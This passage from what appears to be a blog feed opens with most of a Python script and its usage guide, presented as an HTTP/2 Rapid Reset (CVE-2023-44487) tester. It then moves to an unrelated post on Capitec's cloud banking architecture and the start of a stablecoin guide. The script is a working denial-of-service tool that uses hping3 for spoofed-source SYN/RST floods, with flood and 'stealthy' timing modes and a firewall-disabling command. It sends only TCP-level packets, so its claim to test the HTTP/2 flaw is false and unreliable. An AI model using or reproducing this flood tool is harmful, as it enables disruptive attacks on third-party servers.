        """Get a random IP address from the CIDR block"""
        if not self.source_ips:
            return None
        return random.choice(self.source_ips)

    def get_hping_command(self) -> str:
        """Determine which hping command is available"""
        result = subprocess.run(['which', 'hping3'], capture_output=True, text=True)
        if result.returncode == 0:
            return 'hping3'
        return 'hping'

    def craft_syn_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP SYN packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-S',  # SYN flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting SYN packet: {e}")
            return False

    def craft_rst_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP RST packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-R',  # RST flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting RST packet: {e}")
            return False

    def rapid_reset_test(
        self,
        num_packets: int,
        packets_per_ip: int = 10,
        reset_ratio: float = 1.0,
        delay_between_bursts: float = 0.01
    ) -> dict:
        """
        Perform rapid reset attack simulation

        Args:
            num_packets: Total number of packets to send
            packets_per_ip: Number of packets per source IP before switching
            reset_ratio: Ratio of RST packets to SYN packets (1.0 = equal)
            delay_between_bursts: Delay between packet bursts in seconds

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None
        }

        print(f"\nStarting HTTP/2 Rapid Reset test:")
        print(f"   Total packets: {num_packets}")
        print(f"   Packets per source IP: {packets_per_ip}")
        print(f"   RST to SYN ratio: {reset_ratio}")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
            print(f"   Available source IPs: {len(self.source_ips)}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        used_ips = set()
        packets_sent = 0
        current_ip_packets = 0
        current_source_ip = self.get_random_source_ip()

        if current_source_ip:
            used_ips.add(current_source_ip)

        try:
            while packets_sent < num_packets:
                # Switch to new source IP if needed
                if current_ip_packets >= packets_per_ip and self.source_ips:
                    current_source_ip = self.get_random_source_ip()
                    used_ips.add(current_source_ip)
                    current_ip_packets = 0

                # Send SYN packet
                if self.craft_syn_packet(current_source_ip, count=1):
                    results['syn_packets'] += 1
                    results['total_packets'] += 1
                    packets_sent += 1
                    current_ip_packets += 1
                else:
                    results['failed_packets'] += 1

                # Send RST packet based on ratio
                if random.random() < reset_ratio:
                    if self.craft_rst_packet(current_source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                        packets_sent += 1
                        current_ip_packets += 1
                    else:
                        results['failed_packets'] += 1

                # Progress indicator
                if packets_sent % 100 == 0:
                    elapsed = time.time() - results['start_time']
                    rate = packets_sent / elapsed if elapsed > 0 else 0
                    print(f"Progress: {packets_sent}/{num_packets} packets "
                          f"({rate:.0f} pps) | "
                          f"Unique IPs: {len(used_ips)}")

                # Small delay between bursts
                if delay_between_bursts > 0:
                    time.sleep(delay_between_bursts)

        except KeyboardInterrupt:
            print("\nTest interrupted by user")
        except Exception as e:
            print(f"\nTest error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def flood_mode(
        self,
        duration: int = 60,
        packet_rate: int = 1000
    ) -> dict:
        """
        Perform continuous flood attack for specified duration

        Args:
            duration: Duration of the flood in seconds
            packet_rate: Target packet rate per second

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None,
            'duration': duration
        }

        print(f"\nStarting flood mode:")
        print(f"   Duration: {duration} seconds")
        print(f"   Target rate: {packet_rate} packets/second")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        end_time = time.time() + duration
        used_ips = set()

        try:
            while time.time() < end_time:
                batch_start = time.time()

                # Send batch of packets
                for _ in range(packet_rate // 10):  # Batch in 0.1s intervals
                    source_ip = self.get_random_source_ip()
                    if source_ip:
                        used_ips.add(source_ip)

                    # Send SYN
                    if self.craft_syn_packet(source_ip, count=1):
                        results['syn_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                    # Send RST
                    if self.craft_rst_packet(source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                # Rate limiting
                batch_duration = time.time() - batch_start
                sleep_time = 0.1 - batch_duration
                if sleep_time > 0:
                    time.sleep(sleep_time)

                # Progress update
                elapsed = time.time() - results['start_time']
                remaining = end_time - time.time()
                rate = results['total_packets'] / elapsed if elapsed > 0 else 0

                print(f"Elapsed: {elapsed:.1f}s | Remaining: {remaining:.1f}s | "
                      f"Rate: {rate:.0f} pps | Total: {results['total_packets']}")

        except KeyboardInterrupt:
            print("\nFlood interrupted by user")
        except Exception as e:
            print(f"\nFlood error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def display_results(self, results: dict):
        """Display test results in a readable format"""
        duration = results['end_time'] - results['start_time']

        print("\n" + "=" * 60)
        print("TEST RESULTS")
        print("=" * 60)
        print(f"Total packets sent:      {results['total_packets']}")
        print(f"SYN packets:             {results['syn_packets']}")
        print(f"RST packets:             {results['rst_packets']}")
        print(f"Failed packets:          {results['failed_packets']}")
        print(f"Unique source IPs used:  {results['unique_source_ips']}")
        print(f"Test duration:           {duration:.2f}s")

        if duration > 0:
            rate = results['total_packets'] / duration
            print(f"Average packet rate:     {rate:.0f} packets/second")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        if results['failed_packets'] > results['total_packets'] * 0.5:
            print("WARNING: High failure rate detected")
            print("  Check network connectivity and firewall rules")
        elif results['total_packets'] > 0:
            print("Test completed successfully")
            print("  Monitor target server for:")
            print("    Connection state table exhaustion")
            print("    CPU/memory utilization spikes")
            print("    Application performance degradation")

        print("=" * 60 + "\n")

def main():
    parser = argparse.ArgumentParser(
        description='Test web servers for HTTP/2 Rapid Reset vulnerability (macOS version)',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test with CIDR block
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

  # Specify network interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

  # Flood mode for 60 seconds
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 10.0.0.0/16 --flood --duration 60

  # High intensity test with specific interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 172.16.0.0/12 --interface en1 --packets 10000 --packetsperip 50

  # Test without IP spoofing
  sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Prerequisites:
  1. Install hping3: brew install hping
  2. Run with sudo for raw socket access
  3. Check available interfaces: ifconfig

Note: IP spoofing works reliably with hping3 across different network environments.
        """
    )

    # Connection parameters
    parser.add_argument('--host', required=True, help='Target hostname or IP address')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--cidr', help='CIDR block for source IP spoofing (e.g., 192.168.1.0/24)')
    parser.add_argument('--interface', help='Network interface to use (e.g., en0, en1). Optional.')
    parser.add_argument('--timeout', type=int, default=30, help='Command timeout in seconds (default: 30)')

    # Test mode parameters
    parser.add_argument('--flood', action='store_true', help='Enable flood mode (continuous attack)')
    parser.add_argument('--duration', type=int, default=60, help='Duration for flood mode in seconds (default: 60)')
    parser.add_argument('--packetrate', type=int, default=1000, help='Target packet rate for flood mode (default: 1000)')

    # Normal mode parameters
    parser.add_argument('--packets', type=int, default=1000,
                       help='Total number of packets to send (default: 1000)')
    parser.add_argument('--packetsperip', type=int, default=10,
                       help='Number of packets per source IP before switching (default: 10)')
    parser.add_argument('--resetratio', type=float, default=1.0,
                       help='Ratio of RST to SYN packets (default: 1.0)')
    parser.add_argument('--burstdelay', type=float, default=0.01,
                       help='Delay between packet bursts in seconds (default: 0.01)')

    # Other options
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    # Print header
    print("=" * 60)
    print("HTTP/2 Rapid Reset Vulnerability Tester for macOS")
    print("CVE-2023-44487")
    print("Using hping3 for packet crafting")
    print("=" * 60)
    print(f"Target: {args.host}:{args.port}")
    if args.cidr:
        print(f"Source CIDR: {args.cidr}")
    else:
        print("Source IP: Local IP (no spoofing)")
    if args.interface:
        print(f"Interface: {args.interface}")
    print("=" * 60)

    # Create tester instance
    try:
        tester = HTTP2RapidResetTester(
            host=args.host,
            port=args.port,
            cidr_block=args.cidr,
            timeout=args.timeout,
            verbose=args.verbose,
            interface=args.interface
        )
    except RuntimeError as e:
        print(f"ERROR: {e}")
        sys.exit(1)

    try:
        if args.flood:
            # Run flood mode
            results = tester.flood_mode(
                duration=args.duration,
                packet_rate=args.packetrate
            )
        else:
            # Run normal rapid reset test
            results = tester.rapid_reset_test(
                num_packets=args.packets,
                packets_per_ip=args.packetsperip,
                reset_ratio=args.resetratio,
                delay_between_bursts=args.burstdelay
            )

        # Display results
        tester.display_results(results)

    except KeyboardInterrupt:
        print("\nTest interrupted by user")
        sys.exit(0)
    except Exception as e:
        print(f"\nFatal error: {e}")
        import traceback
        if args.verbose:
            traceback.print_exc()
        sys.exit(1)

if __name__ == '__main__':
    main()
EOF
chmod +x http2rapidresettester_macos.py

Using the Testing Script on macOS

Summary of usage:

# Use specific interface
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

# Use WiFi interface (typically en0 on MacBooks)
sudo python3 http2rapidresettester_macos.py --host example.com --interface en0 --packets 500

# Use Ethernet interface
sudo python3 http2rapidresettester_macos.py --host example.com --interface en1 --cidr 10.0.0.0/16 --flood --duration 30

# Without interface (uses default routing)
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Test your server with CIDR block spoofing:

sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Advanced Examples

High intensity test (use cautiously in test environments):

sudo python3 http2rapidresettester_macos.py \
    --host staging.example.com \
    --cidr 10.0.0.0/16 \
    --packets 5000 \
    --packetsperip 50

Flood mode for sustained testing:

sudo python3 http2rapidresettester_macos.py \
    --host test.example.com \
    --cidr 172.16.0.0/12 \
    --flood \
    --duration 60 \
    --packetrate 500

Test without IP spoofing:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000

Verbose mode for debugging:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 100 \
    --verbose

Gradual escalation test (start small, increase if needed):

# Start with 50 packets
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 50

# If server handles it well, increase
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 200

# Final aggressive test
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Interpreting Results

The script outputs packet statistics including:

  • Total packets sent (SYN and RST combined)
  • Number of SYN packets
  • Number of RST packets
  • Failed packet count
  • Number of unique source IPs used
  • Average packet rate
  • Test duration

What to Monitor

Monitor your target server for:

  • Connection state table exhaustion: Check netstat or ss output for connection counts
  • CPU and memory utilization spikes: Use Activity Monitor or top command
  • Application performance degradation: Monitor response times and error rates
  • Firewall or rate limiting triggers: Check firewall logs and rate limiting counters

Protected Server Indicators

  • High failure rate in the test results
  • Server actively blocking or rate limiting connections
  • Firewall rules triggering during test
  • Connection resets from the server

Vulnerable Server Indicators

  • All packets successfully sent with low failure rate
  • No rate limiting or blocking observed
  • Server continues processing all requests
  • Resource utilization climbs steadily

Why hping3 for macOS?

Using hping3 provides several advantages for macOS users:

Universal IP Spoofing Support

  • Consistent behavior: hping3 provides reliable IP spoofing across different network configurations
  • Proven tool: Industry standard for packet crafting and network testing
  • Better compatibility: Works with most network interfaces and routing configurations

macOS Specific Benefits

  • Native support: Works well with macOS network stack
  • Firewall compatibility: Better integration with macOS firewall
  • Performance: Efficient packet generation on macOS

Reliability Advantages

  • Mature codebase: hping3 has been battle tested for decades
  • Active community: Well documented with extensive community support
  • Cross platform: Same tool works on Linux, BSD, and macOS

macOS Installation and Setup

Installing hping3

# Using Homebrew (recommended)
brew install hping

# Verify installation
which hping3
hping3 --version

Firewall Configuration

macOS firewall may need configuration for raw packet injection:

  1. Open System Preferences > Security & Privacy > Firewall
  2. Click “Firewall Options”
  3. Add Python to allowed applications
  4. Grant network access when prompted

Alternatively, for testing environments:

# Temporarily disable firewall (not recommended for production)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off

# Re-enable after testing
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on

Network Interfaces

List available network interfaces:

ifconfig

Common macOS interfaces:

  • en0: Primary Ethernet/WiFi
  • en1: Secondary network interface
  • lo0: Loopback interface
  • bridge0: Bridged interface (if using virtualization)

Best Practices for Testing

  1. Start with staging/test environments: Never run aggressive tests against production without authorization
  2. Coordinate with your team: Inform security and operations teams before testing
  3. Monitor server metrics: Watch CPU, memory, and connection counts during tests
  4. Test during low traffic periods: Minimize impact on real users if testing production
  5. Gradual escalation: Start with conservative parameters and increase gradually
  6. Document results: Keep records of test results and any configuration changes
  7. Have rollback plans: Be prepared to quickly disable testing if issues arise

Troubleshooting on macOS

Error: “hping3 is not installed”

Install hping3 using Homebrew:

brew install hping

Error: “Operation not permitted”

Make sure you are running with sudo:

sudo python3 http2rapidresettester_macos.py [options]

Error: “No route to host”

Check your network connectivity:

ping example.com
traceroute example.com

Verify your network interface is up:

ifconfig en0

Packets Not Being Sent

Possible causes and solutions:

  1. Firewall blocking: Temporarily disable firewall or add exception
  2. Interface not active: Check ifconfig output
  3. Permission issues: Ensure running with sudo
  4. Wrong interface: Specify interface with hping3 using i flag

Low Packet Rate

Performance optimization tips:

  • Use wired Ethernet instead of WiFi
  • Close other network intensive applications
  • Reduce packet rate target with --packetrate
  • Use smaller CIDR blocks

Monitoring Your Tests

Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

Activity Monitor

Monitor system resources during testing:

  1. Open Activity Monitor (Applications > Utilities > Activity Monitor)
  2. Select “Network” tab
  3. Watch “Packets in” and “Packets out”
  4. Monitor “Data sent/received”
  5. Check CPU usage of Python process

Server Side Monitoring

On your target server, monitor:

# Connection states
netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

# Active connections count
netstat -an | grep ESTABLISHED | wc -l

# SYN_RECV connections
netstat -an | grep SYN_RECV | wc -l

# System resources
top -l 1 | head -10

Understanding IP Spoofing with hping3

How It Works

hping3 creates raw packets at the network layer, allowing you to specify arbitrary source IP addresses. This bypasses normal TCP/IP stack restrictions.

Network Requirements

For IP spoofing to work effectively:

  • Local networks: Works best on LANs you control
  • Direct routing: Requires direct layer 2 access
  • No NAT interference: NAT devices may rewrite source addresses
  • Router configuration: Some routers filter spoofed packets (BCP 38)

Testing Without Spoofing

If IP spoofing is not working in your environment:

# Test without CIDR block
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

# This still validates:
# - Rate limiting configuration
# - Stream management
# - Server resilience
# - Resource consumption patterns

Advanced Configuration Options

Custom Packet Timing

# Slower, more stealthy testing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 500 \
    --burstdelay 0.1  # 100ms between bursts

# Faster, more aggressive
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --burstdelay 0.001  # 1ms between bursts

Custom RST to SYN Ratio

# More SYN packets (mimics connection attempts)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 0.3  # 1 RST for every 3 SYN

# Equal SYN and RST (classic rapid reset)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 1.0

Targeting Different Ports

# Test HTTPS (port 443)
sudo python3 http2rapidresettester_macos.py --host example.com --port 443

# Test HTTP/2 on custom port
sudo python3 http2rapidresettester_macos.py --host example.com --port 8443

# Test load balancer
sudo python3 http2rapidresettester_macos.py --host lb.example.com --port 443

Understanding the Attack Surface

When testing your infrastructure:

  1. Test all HTTP/2 endpoints: Web servers, load balancers, API gateways
  2. Verify CDN protection: Test both origin and CDN endpoints
  3. Test direct vs proxied: Compare protection at different layers
  4. Validate rate limiting: Ensure limits trigger at expected thresholds
  5. Confirm monitoring: Verify alerts trigger correctly

Conclusion

The HTTP/2 Rapid Reset vulnerability represents a significant threat to web infrastructure, but with proper patching, configuration, and monitoring, you can effectively protect your systems. This macOS optimized testing script using hping3 allows you to validate your defenses in a controlled manner with reliable IP spoofing capabilities across different network environments.

Remember that security is an ongoing process. Regularly:

  • Update your web server and proxy software
  • Review and adjust HTTP/2 configuration limits
  • Monitor for unusual traffic patterns
  • Test your defenses against emerging threats

By staying vigilant and proactive, you can maintain a resilient web presence capable of withstanding sophisticated DDoS attacks.

Additional Resources


This blog post and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.

0
0

Why Bigger Banks Were Historically More Fragile and Why Architecture Determines Resilience

1. Size Was Once Mistaken for Stability

For most of modern banking history, stability was assumed to increase with size. The thinking was the bigger you are, the more you should care, the more resources you can apply to problems. Larger banks had more capital, more infrastructure, and more people. In a pre-cloud world, this assumption appeared reasonable.

In practice, the opposite was often true.

Before cloud computing and elastic infrastructure, the larger a bank became, the more unstable it was under stress and the harder it was to maintain any kind of delivery cadence. Scale amplified fragility. In 2025, architecture (not size) has become the primary determinant of banking stability.

2. Scale, Fragility, and Quantum Entanglement

Traditional banking platforms were built on vertically scaled systems: mainframes, monolithic databases, and tightly coupled integration layers. These systems were engineered for control and predictability, not for elasticity or independent change.

As banks grew, they didn’t just add clients. They added products. Each new product introduced new dependencies, shared data models, synchronous calls, and operational assumptions. Over time, this created a state best described as quantum entanglement.

In this context, quantum entanglement refers to systems where:

  • Products cannot change independently
  • A change in one area unpredictably affects others
  • The full impact of change only appears under real load
  • Cause and effect are separated by time, traffic, and failure conditions

The larger the number of interdependent products, the more entangled the system becomes.

2.1 Why Entanglement Reduces Stability

As quantum entanglement increases, change becomes progressively riskier. Even small modifications require coordination across multiple teams and systems. Release cycles slow and defensive complexity increases.

Recovery also becomes harder. When something breaks, rolling back a single change is rarely sufficient because multiple products may already be in partially failed or inconsistent states.

Fault finding degrades as well. Logs, metrics, and alerts point in multiple directions. Symptoms appear far from root causes, forcing engineers to chase secondary effects rather than underlying faults.

Most importantly, blast radius expands. A fault in one product propagates through shared state and synchronous dependencies, impacting clients who weren’t using the originating product at all.

The paradox is that the very success of large banks (broad product portfolios) becomes a direct contributor to instability.

3. Why Scale Reduced Stability in the Pre-Cloud Era

Before cloud computing, capacity was finite, expensive, and slow to change. Systems scaled vertically, and failure domains were large by design.

As transaction volumes and product entanglement increased, capacity cliffs became unavoidable. Peak load failures became systemic rather than local. Recovery times lengthened and client impact widened.

Large institutions often appeared stable during normal operation but failed dramatically under stress. Smaller institutions appeared more stable largely because they had fewer entangled products and simpler operational surfaces (not because they were inherently better engineered).

Capitec itself experienced this capacity cliff, when its core banking SQL DB hit a capacity cliff in August 2022. In order to recover the service, close to 100 changes were made which resulted in a downtime of around 40 hrs. The wider service recovery took weeks, with missed payments a duplicate payments being fixed on a case by case basis. It was at this point that Capitec’s leadership drew a line in the sand and decided to totally re-engineer its entire stack from the ground up in AWS. This blog post is really trying to share a few nuggets from the engineering journey we went on, and hopefully help others all struggling the with burden of scale and hardened synchronous pathways.

4. Cloud Changed the Equation (But Only When Architecture Changed)

Cloud computing made it possible to break entanglement, but only for organisations willing to redesign systems to exploit it.

Horizontal scaling, availability zone isolation, managed databases, and elastic compute allow products to exist as independent domains rather than tightly bound extensions of a central core.

Institutions that merely moved infrastructure to the cloud without breaking product entanglement continue to experience the same instability patterns (only on newer hardware).

5. An Architecture Designed to Avoid Entanglement

Capitec represents a deliberate rejection of quantum entanglement.

Its entire App production stack is cloud native on AWS, Kubernetes, Kafka and Postgres. The platform is well advanced in rolling out new Java 25 runtimes, alongside ahead of time (AOT) optimisation to further reduce scale latency, improve startup characteristics, and increase predictability under load. All Aurora Serverless are setup with read replicas, offloading read pressure from write paths. All workloads are deployed across three availability zones, ensuring resilience. Database access is via the AWS JDBC wrapper (which enables extremely rapid failovers, outside of DNS TTLs)

Crucially, products are isolated by design. There is no central product graph where everything depends on everything else. But, a word of caution, we are “not there yet”. We will always have edges that can hurt and we you hit an edge at speed, sometimes its hard to get back up on your feet. Often you see that the downtime you experienced, simply results in pent up demand. Put another way, the volume that took your systems offline, is now significantly LESS than the volume thats waiting for you once you recover! This means that you somehow have to magically add capacity, or optimise code, during an outage in order to recover the service. You will often say “Rate Limiting” fan club put a foot forward when I discuss burst recoverability. I personally don’t buy this for single entity services (for a complex set of reasons). For someone like AWS, it absolutely makes sense to carry the enormous complexity of guarding services with rate limits. But I don’t believe the same is true for a single entity ecosystem, in these instances, offloading is normally a purer pathway.

6. Write Guarding as a Stability Primitive

Capitec’s mobile and digital platforms employ a deliberate **write guarding** strategy.

Read only operations (such as logging into the app) are explicitly prevented from performing inline write operations. Activities like audit logging, telemetry capture, behavioural flags, and notification triggers are never executed synchronously on high volume read paths.

Instead, these concerns are offloaded asynchronously using Amazon MSK (Managed Streaming for Apache Kafka) or written to in memory data stores such as Valkey, where they can be processed later without impacting the user journey.

This design completely removes read-write contention from critical paths. Authentication storms, balance checks, and session validation no longer compete with persistence workloads. Under load, read performance remains stable because it is not coupled to downstream write capacity.

Critically, write guarding prevents database maintenance pressure (such as vacuum activity) from leaking into high volume events like logins. Expensive background work remains isolated from customer facing read paths.

Write guarding turns one of the most common failure modes in large banking systems (read traffic triggering hidden writes) into a non event. Stability improves not by adding capacity, but by removing unnecessary coupling.

7. Virtual Threads as a Scalability Primitive

Java 25 introduces mature virtual threading as a first class concurrency model. This fundamentally changes how high concurrency systems behave under load.

Virtual threads decouple application concurrency from operating system threads. Instead of being constrained by a limited pool of heavyweight threads, services can handle hundreds of thousands of concurrent blocking operations without exhausting resources.

Request handling becomes simpler. Engineers can write straightforward blocking code without introducing thread pool starvation or complex asynchronous control flow.

Tail latency improves under load. When traffic spikes, virtual threads queue cheaply rather than collapsing the system through thread exhaustion.

Failure isolation improves. Slow downstream calls no longer monopolise scarce threads, reducing cascading failure modes.

Operationally, virtual threads align naturally with containerised, autoscaling environments. Concurrency scales with demand, not with preconfigured thread limits.

When combined with modern garbage collectors and ahead of time optimisation, virtual threading removes an entire class of concurrency related instability that plagued earlier JVM based banking platforms.

8. Nimbleness Emerges When Entanglement Disappears

When blast zones and integration choke points disappear, teams regain the ability to move quickly without increasing systemic risk.

Domains communicate through well defined RESTful interfaces, often across separate AWS accounts, enforcing isolation as a first class property. A failure in one domain does not cascade across the organisation.

To keep this operable at scale, Capitec uses Backstage (via an internal overlay called ODIN) as its internal orchestration and developer platform. All AWS accounts, services, pipelines, and operational assets are created to a common standard. Teams consume platform capability rather than inventing infrastructure.

This eliminates configuration drift, reduces cognitive load, and ensures that every new product inherits the same security, observability, and resilience characteristics.

The result is nimbleness without fragility.

9. Operational Stability Is Observability Plus Action

In entangled systems, failures are discovered by clients and stability is measured retrospectively.

Capitec operates differently. End to end observability through Instana and its in house AI platform, Neo, correlates client side errors, network faults, infrastructure signals, and transaction failures in real time. Issues are detected as they emerge, not after they cascade.

This operational awareness allows teams to intervene early, contain issues quickly, and reduce client impact before failures escalate.

Stability, in this model, is not the absence of failure. It is fast detection, rapid containment, and decisive response.

10. Fraud Prevention Without Creating New Entanglement

Fraud is treated as a first class stability concern rather than an external control.

Payments are evaluated inline as they move through the bank. Abnormal velocity, behavioural anomalies, and account provenance are assessed continuously. Even fraud reported in the call center is immediately visible to other clients paying from the Capitec App. Clients are presented with conscience pricking prompts for high risk payments; these frequently stop fraud as the clients abandon the payment when presented with the risks.

Capitec runs a real time malware detection engine directly on client devices. This engine detects hooks and overlays installed by malicious applications. When malware is identified, the client’s account is immediately stopped, preventing fraudulent transactions before they occur.

Because fraud controls are embedded directly into the transaction flow, they don’t introduce additional coupling or asynchronous failure modes.

The impact is measurable. Capitec’s fraud prevention systems have prevented R300 million in client losses from fraud. In November alone, these systems saved clients a further R60 million in fraud losses.

11. The Myth of Stability Through Multicloud

Multicloud is often presented as a stability strategy. In practice, it is largely a myth.

Running across multiple cloud providers does not remove failure risk. It compounds it. Cross cloud communication can typically only be secured using IP based controls, weakening security posture. Operational complexity increases sharply as teams must reason about heterogeneous platforms, tooling, failure modes, and networking behaviour.

Most critically, multicloud does not eliminate correlated failure. If either cloud provider becomes unavailable, systems are usually unusable anyway. The result is a doubled risk surface, increased operational risk, and new inter cloud network dependencies (without a corresponding reduction in outage impact).

Multicloud increases complexity, weakens controls, and expands risk surface area without delivering meaningful resilience.

12. What Actually Improves Stability

There are better options than multicloud.

Hybrid cloud with anti-affinity on critical channels is one. For example, card rails can be placed in two physically separate data centres so that if cloud based digital channels are unavailable, clients can still transact via cards and ATMs. This provides real functional resilience rather than architectural illusion.

Multi region deployment within a single cloud provider is another. This provides geographic fault isolation without introducing heterogeneous complexity. However, this only works if the provider avoids globally scoped services that introduce hidden single points of failure. At present, only AWS consistently supports this model. Some providers expose global services (such as global front doors) that introduce global blast radius and correlated failure risk.

True resilience requires isolation of failure domains, not duplication of platforms.

13. Why Traditional Banks Still Struggle

Traditional banks remain constrained by entangled product graphs, vertically scaled cores, synchronous integration models, and architectural decisions from a different era. As product portfolios grow, quantum entanglement increases. Change slows, recovery degrades, and outages become harder to diagnose and contain.

Modernisation programmes often increase entanglement temporarily through dual run architectures, making systems more fragile before they become more stable (if they ever do).

The challenge is not talent or ambition. It is the accumulated cost of entanglement.

14. Stability at Scale Without the Traditional Trade Off

Capitec’s significance is not that it is small. It is that it is large and remains stable.

Despite operating at massive scale with a broad product surface and high transaction volumes, stability improves rather than degrades. Scale does not increase blast radius, recovery time, or change risk. It increases parallelism, isolation, and resilience.

This directly contradicts historical banking patterns where growth inevitably led to fragility. Capitec demonstrates that with the right architecture, scale and stability are no longer opposing forces.

15. Final Thought

Before cloud and autoscaling, scale and stability were inversely related. The more products a bank had, the more entangled and fragile it became.

In 2025, that relationship can be reversed (but only by breaking entanglement, isolating failure domains, and avoiding complexity masquerading as resilience).

Doing a deal with a cloud provider means nothing if transformation stalls inside the organisation. If dozens of people carry the title of CIO while quietly pulling the handbrake on the change that is required, the outcome is inevitable regardless of vendor selection.

There is also a strategic question that many institutions avoid. If forced to choose between operating in a jurisdiction that is hostile to public cloud or accessing the full advantages of cloud, waiting is not a strategy. When that jurisdiction eventually allows public cloud, the market will already be populated by banks that moved earlier, built cloud native platforms, and are now entering at scale.

Capitec is an engineering led bank whose stability and speed increase with scale. Traditional banks remain constrained by quantum entanglement baked into architectures from a different era.

These outcomes are not accidental. They are the inevitable result of architectural and organisational choices made years ago, now playing out under real world load.

0
0

Stablecoins: A Comprehensive Guide

1. What Are Stablecoins?

Stablecoins are a type of cryptocurrency designed to maintain a stable value by pegging themselves to a reserve asset, typically a fiat currency like the US dollar. Unlike volatile cryptocurrencies such as Bitcoin or Ethereum, which can experience dramatic price swings, stablecoins aim to provide the benefits of digital currency without the price volatility.

The most common types of stablecoins include:

Fiat collateralized stablecoins are backed by traditional currencies held in reserve at a 1:1 ratio. Examples include Tether (USDT) and USD Coin (USDC), which maintain reserves in US dollars or dollar equivalent assets.

Crypto collateralized stablecoins use other cryptocurrencies as collateral, often over collateralized to account for volatility. DAI is a prominent example, backed by Ethereum and other crypto assets.

